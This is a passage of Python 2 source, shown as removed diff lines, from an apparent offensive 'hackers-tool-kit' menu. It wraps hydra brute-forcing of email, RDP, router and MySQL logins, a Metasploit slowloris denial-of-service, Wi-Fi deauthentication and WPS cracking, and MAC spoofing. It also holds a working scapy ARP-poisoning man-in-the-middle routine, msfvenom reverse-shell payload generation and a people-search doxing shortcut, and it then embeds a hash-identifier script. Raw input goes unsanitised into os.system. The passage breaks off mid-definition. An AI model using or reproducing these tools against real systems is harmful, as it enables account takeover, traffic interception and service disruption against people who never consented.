- elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def 